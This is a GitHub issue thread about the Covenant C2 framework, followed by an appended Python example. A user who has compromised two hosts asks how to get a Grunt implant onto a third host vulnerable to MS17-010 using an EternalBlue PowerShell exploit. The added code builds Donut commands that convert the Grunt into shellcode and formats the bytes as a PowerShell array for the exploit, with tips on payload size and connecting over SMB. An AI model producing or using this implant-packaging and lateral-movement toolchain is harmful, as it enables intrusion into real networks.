Closed sohelahmed786 closed 4 years ago
If you need to execute as shellcode, then you can convert a Grunt assembly to PIC using a tool like Donut.
Feel free to continue discussing here, but I'm going to close this as there really isn't an "issue".
@sohelahmed786 You may be interested in joining the #covenant channel in the BloodHoundGang slack in the future for these sorts of questions/discussions: https://bloodhoundgang.herokuapp.com/
Thanks @rasta-mouse and @cobbr. I'll take a look at those links :)
Currently I'm in a situation where I have compromised Host1 and Host2 but not Host3. Let's say Host1 (pwned) ---> Host2 (pwned and got a GruntSMB shell) --> Host3 (MS17-010 vulnerable).
I can use a PowerShell payload like https://github.com/EmpireProject/Empire/blob/master/data/module_source/exploitation/Exploit-EternalBlue.ps1 to try to exploit the Host3 machine.
But how will I get a connection back to my machine? I may need Covenant's GruntSMB shellcode to use with the exploit, but there's no option. It might be easier with Cobalt Strike or msf, but I'm not using them.
Can you please suggest what I can do now?
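The maintainer's suggestion above is to turn the Grunt into position-independent code with Donut and hand that to the exploit. The following is an added example (not Covenant's or Donut's own code, and not part of the original thread) of the packaging step: build the Donut command line for a Grunt stager assembly, and render the resulting raw bytes as a PowerShell `[Byte[]]` literal that can be wired into a PowerShell exploit script. It assumes the Donut CLI (https://github.com/TheWover/donut) is on PATH and that its flags match the 1.0 release (`-i` input, `-a` arch, `-f` format, `-o` output); older 0.9.x builds used `-f` for the input path, so confirm with `donut -h`. The file names `GruntStager.exe` and `grunt.bin` and the sample bytes in `__main__` are constructed placeholders. Note also that a GruntSMB Grunt listens on a named pipe on the host it runs on, so once the shellcode runs on Host3 you connect to it from the Host2 Grunt with Covenant's `Connect` task rather than waiting for a callback.

```python
"""Package a Covenant Grunt as raw shellcode for a PowerShell exploit.

Added example, not Covenant's or Donut's own code. Flag values below are
assumed from the Donut 1.0 README; check `donut -h` on your build.
"""
import shutil
import subprocess
from pathlib import Path

# Donut -a values (assumed from its README): 1=x86, 2=amd64, 3=x86+amd64.
DONUT_ARCH = {"x86": "1", "x64": "2", "x86+x64": "3"}
# Donut -f value for raw shellcode bytes (1=Binary; 2=Base64, 6=PowerShell, ...).
DONUT_FMT_BINARY = "1"


def donut_command(assembly: str, out: str, arch: str = "x64") -> list:
    """Build the argv that turns a Grunt .NET assembly into PIC.

    Covenant's Binary launcher emits a .NET exe; Donut hosts the CLR in-process
    and runs its entry point, so no class/method flags are needed for an exe.
    """
    if arch not in DONUT_ARCH:
        raise ValueError(f"unknown arch {arch!r}; expected one of {sorted(DONUT_ARCH)}")
    return ["donut", "-i", assembly, "-a", DONUT_ARCH[arch], "-f", DONUT_FMT_BINARY, "-o", out]


def run_donut(assembly: str, out: str, arch: str = "x64") -> bytes:
    """Run Donut and return the raw shellcode. Requires donut on PATH."""
    if shutil.which("donut") is None:
        raise RuntimeError("donut not found on PATH; build it from https://github.com/TheWover/donut")
    subprocess.run(donut_command(assembly, out, arch), check=True, capture_output=True)
    return Path(out).read_bytes()


def to_powershell_bytes(shellcode: bytes, var: str = "$buf", width: int = 12) -> str:
    """Render shellcode as a [Byte[]] literal for a PowerShell script.

    Lines are wrapped after `width` bytes with a trailing comma, which PowerShell
    treats as a line continuation, so the literal survives copy/paste intact.
    """
    if not shellcode:
        raise ValueError("empty shellcode")
    hexed = [f"0x{b:02x}" for b in shellcode]
    rows = [",".join(hexed[i:i + width]) for i in range(0, len(hexed), width)]
    return f"[Byte[]] {var} = " + ",\n    ".join(rows)


def fits_payload_limit(shellcode: bytes, limit: int) -> bool:
    """Check the payload against whatever size the exploit can deliver.

    A Donut-wrapped .NET assembly is tens to hundreds of KB (loader plus
    assembly); a silent crash on the target is the usual symptom of overrunning
    the exploit's payload buffer, so check here first.
    """
    return len(shellcode) <= limit


if __name__ == "__main__":
    # Constructed sample bytes standing in for run_donut("GruntStager.exe", "grunt.bin").
    sample = bytes([0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50])
    print(" ".join(donut_command("GruntStager.exe", "grunt.bin")))
    print(to_powershell_bytes(sample, var="$sc"))
```

`to_powershell_bytes` is deliberately separate from `run_donut` so the same rendering works on shellcode from any other generator; `run_donut` is the only function that needs Donut installed. Donut can also emit a PowerShell-formatted string directly (`-f 6`), which is worth preferring when you do not need to post-process the bytes.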